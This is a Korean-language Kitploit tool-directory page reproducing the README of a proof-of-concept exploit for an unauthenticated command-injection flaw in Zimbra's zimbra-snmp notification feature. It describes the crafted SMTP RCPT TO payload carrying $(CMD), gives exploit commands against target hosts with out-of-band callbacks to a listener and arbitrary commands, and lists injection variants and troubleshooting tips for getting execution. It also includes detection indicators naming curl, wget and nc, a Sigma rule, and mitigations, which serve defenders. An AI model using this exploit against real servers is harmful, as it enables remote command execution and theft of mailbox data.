Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-73570 — CVE-2026-73570에 대한 개념 증명 익스플로잇으로, zimbra-snmp 로그 인젝션을 통한 Zimbra Collaboration Suite의 인증되지 않은 OS 명령 주입 취약점이며, 탐지 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/hainhc/cve-2026-73570
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingIncident ResponseEmail Security
GitHubhainhc/cve-2026-73570

CVE-2026-73570

CVE-2026-73570에 대한 개념 증명 익스플로잇으로, zimbra-snmp 로그 인젝션을 통한 Zimbra Collaboration Suite의 인증되지 않은 OS 명령 주입 취약점이며, 탐지 지침을 포함합니다.

저장소 보기
1일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-73570 — Zimbra zimbra-snmp 인증되지 않은 OS 명령 주입 PoC

CVE-2026-73570에 대한 개념 증명 익스플로잇으로, Zimbra Collaboration Suite < 10.1.20에서 zimbra-snmp 패키지가 설치되어 있고 SNMP 알림이 활성화된 경우 발생하는 인증되지 않은 OS 명령 주입(CWE-78, CVSS 8.9) 취약점입니다.

면책 조항: 이 PoC는 오직 승인된 보안 테스트, 방어 연구, 그리고 자신의 시스템 검증을 위한 것입니다. 소유하지 않았거나 명시적인 서면 테스트 허가를 받지 않은 시스템에 대해서는 사용하지 마십시오.

취약점 메커니즘

Zimbra의 SNMP 알림 기능은 swatchdog를 사용하여 /var/log/zimbra.log에서 서비스 이벤트를 모니터링합니다. 로그 라인이 감시 패턴과 일치하면, 일치된 텍스트가 SNMP 알림을 전송하는 셸 명령에 정제 없이 삽입됩니다.

공격 체인:

root@kitploit:~
1. 공격자가 조작된 RCPT TO 주소로 SMTP 세션을 전송합니다:

   RCPT TO:<"x: Service status change: localhost $(CMD)
            changed from stopped to running"@cve.invalid>

   로컬 파트는 RFC 5321 인용 문자열이므로 Postfix는 주소 구문
   (공백, 콜론, $(...) 포함)을 허용합니다.

2. Postfix가 수신자를 거부(릴레이 거부 / 사용자 알 수 없음 / 발신자
   제한)하고 전체 to=<...> 문자열을 따옴표를 제거한 채
   /var/log/zimbra.log에 기록합니다:

   NOQUEUE: reject: RCPT from unknown[x.x.x.x]: ... to=<x: Service status
   change: localhost $(CMD) changed from stopped to [email protected]> ...

3. swatchdog (zimbra-snmp)가 주기적으로 로그를 스캔하여
   watchfor 패턴 "Service status change ... changed from ... to ..."와
   일치하는지 확인합니다.

4. 일치된 텍스트가 SNMP 알림 셸 명령에 삽입됩니다
   -> $(CMD)가 평가됨 -> `zimbra` 사용자로 명령 실행.

요구 사항

대상은 다음 모두를 충족해야 합니다:

  • Zimbra Collaboration < 10.1.20
  • zimbra-snmp 패키지 설치됨
  • SNMP 알림 활성화됨 (zmlocalconfig | grep -i snmp_notify)

공격자 측: Python 3 (표준 라이브러리만 사용, 의존성 없음).

사용법

root@kitploit:~
# 1. 대역 외 DNS 콜백(interactsh / Burp Collaborator)으로 RCE 확인:
python3 poc_cve_2026_73570.py -t mail.target.com --oob abc123.oast.site

# 2. 리스너로의 HTTP 콜백으로 RCE 확인:
python3 poc_cve_2026_73570.py -t mail.target.com --oob http://10.0.0.5:8884/cb

# 3. 호스트에 마커 파일 생성 (이후 서버에서 수동으로 확인):
python3 poc_cve_2026_73570.py -t mail.target.com --cmd "touch /tmp/CVE-2026-73570_pwned"

# 4. 핑거프린팅만 (페이로드 전송 안 함):
python3 poc_cve_2026_73570.py -t mail.target.com --check-only

# 디버그: 전체 SMTP 트랜스크립트 출력
python3 poc_cve_2026_73570.py -t mail.target.com --cmd "id" --debug

옵션:

플래그설명
-t, --target대상 Zimbra SMTP IP/호스트명 (필수)
-p, --portSMTP 포트 (기본값: 25)
--tlsSTARTTLS 사용 (예: 포트 587)
--oob대역 외 DNS 도메인 또는 HTTP 콜백 URL (권장)
--cmdOOB 콜백 대신 임의 명령
--fake-host가짜 Service status change 문자열 내의 호스트명 (기본값: localhost)
--check-only핑거프린팅만, 페이로드 전송 안 함
--delay전송 간 지연 시간(초) (기본값: 1.0)
--debug전체 SMTP 트랜스크립트 출력

검증

스크립트는 각 명령을 여러 주입 변형($(...), 백틱, ;cmd;#, $({IFS}...))으로 전송합니다. 각 변형에 대해 RCPT 응답 코드를 확인하십시오:

RCPT 응답의미
250, 450, 454 Relay access denied, 550 5.1.1 User unknown주소 구문이 허용됨 — 전체 to=<...> 문자열이 포함된 거부 라인이 이제 로그에 기록됨. 페이로드가 심어짐.
501 5.1.3 Bad recipient address syntaxPostfix가 파싱 시점에 주소를 거부함 — 유용한 내용이 기록되지 않음. 스크립트가 자동으로 인용되지 않은 대체 형식으로 재시도함.

그런 다음 서버에서 확인하십시오 (접근 권한이 있는 경우):

root@kitploit:~
# 주입된 라인이 존재해야 함:
grep 'Service status change' /var/log/zimbra.log | tail
# 예상: ... to=<x: Service status change: localhost $(...) changed from stopped to [email protected]> ...

# 1-5분 대기 (swatchdog는 주기적으로 로그를 스캔함 — 실행은 실시간이 아님),
# 그런 다음 효과를 확인:
ls -la /tmp/                    # --cmd를 사용한 경우
# 또는 OOB 리스너에서 콜백 확인

로그 라인이 존재하지만 명령이 실행되지 않는다면, 나머지 전제 조건은 swatchdog 측에 있습니다: 프로세스가 실행 중인지(ps aux | grep swatch) 그리고 해당 구성이 실제로 Service status change 패턴을 감시하는지 확인하십시오.

실행 컨텍스트: 명령은 zimbra 사용자로 실행됩니다 (root가 아님).

문제 해결

  • 로그 라인이 전혀 없음: 소스 IP가 차단되었을 가능성이 높습니다 (반복적인 잘못된 시도 후 fail2ban, 또는 방화벽). fail2ban-client status, iptables -L -n | grep <your_ip>를 확인하고 tcpdump -i any port 25 and host <your_ip> -nn -A로 패킷이 Postfix에 도달하는지 확인하십시오.
  • 너무 좁은 grep: 잘못된 주소는 NOQUEUE: reject 라인이 아닌 warning: Illegal address syntax ... in RCPT command: ...로 기록됩니다. 대신 공격자 IP로 grep하십시오.
  • 실행 지연: swatchdog는 주기적으로 로그를 폴링합니다 — 실패로 결론 내리기 전에 1–5분을 기다리십시오.

탐지 (방어자용)

성공적인 익스플로잇의 주요 지표:

  1. 로그 아티팩트 (시도): /var/log/zimbra.log의 Postfix 거부 라인 내 to=<*: Service status change: *$(...)* — Service status change 텍스트는 to=<> 주소 내에 정당하게 나타나는 경우가 없으므로 오탐이 거의 없습니다.
  2. 프로세스 트리 (높은 신뢰도): swatchdog / swatch의 자식 프로세스로 생성된 모든 셸 또는 명령 인터프리터 (sh, bash, curl, wget, nc, python, perl).
  3. 익스플로잇 후 활동: /opt/zimbra/jetty/webapps/ 또는 /opt/zimbra/jetty_base/webapps/ 아래의 새로운 .jsp/.jspx 파일, /tmp/의 예상치 못한 파일, zimbra 사용자의 새로운 cron 항목 또는 SSH 키, 그리고 정상 메일 흐름과 일치하지 않는 메일 서버의 아웃바운드 연결.

예시 Sigma 규칙 (시도 단계):

root@kitploit:~
title: Zimbra SNMP Notification Log Injection Attempt - CVE-2026-73570
logsource:
  product: linux
  service: postfix
detection:
  sel:
    - 'to=<*: Service status change: *$(*'
    - 'to=<*: Service status change: *`*'
  condition: sel
level: high
tags:
  - attack.initial-access
  - attack.t1190
  - cve.2026.73570

완화 조치

  • Zimbra Collaboration을 10.1.20 이상으로 업그레이드하십시오.
  • 즉시 업그레이드가 불가능한 경우: SNMP 알림을 비활성화하고 패치될 때까지 zimbra-snmp 패키지를 중지/제거하는 것을 고려하십시오.
  • 이 CVE는 확인된 활성 익스플로잇과 함께 CISA KEV에 등재되어 있습니다 — 이전에 취약했던 시스템의 로그를 최소 30일까지 역추적하여 조사하고, 침해가 확인된 경우 전체 메일박스 데이터 노출로 간주하십시오.

참고 자료

  • Zimbra 보안 권고 (벤더): https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
  • Zimbra 10.1.20 패치 릴리스 (수정): https://blog.zimbra.com/2026/07/patch-release-update-zimbra-10-1-20/
  • NVD — CVE-2026-73570: https://nvd.nist.gov/vuln/detail/CVE-2026-73570
  • CISA 알려진 익스플로잇 취약점 카탈로그 (2026-08-21 추가): https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search=CVE-2026-73570
  • CISA 경보 — "CISA Adds One Known Exploited Vulnerability to Catalog": https://www.cisa.gov/news-events/alerts/2026/08/21/cisa-adds-one-known-exploited-vulnerability-catalog
  • CERT Polska 권고 145/2026 (활성 익스플로잇 + IoC 지침, 2026-08-17): https://moje.cert.pl/komunikaty/2026/145/aktywnie-wykorzystywana-podatnosc-w-zimbra-collaboration-suite/
  • BleepingComputer — "Critical Zimbra RCE flaw now actively exploited in attacks": https://www.bleepingcomputer.com/news/security/critical-zimbra-rce-flaw-now-actively-exploited-in-attacks/
  • Help Net Security — "Unpatched Zimbra servers are falling to CVE-2026-73570 attacks": https://www.helpnetsecurity.com/2026/08/25/zimbra-cve-2026-73570-compromised/
도구 다운로드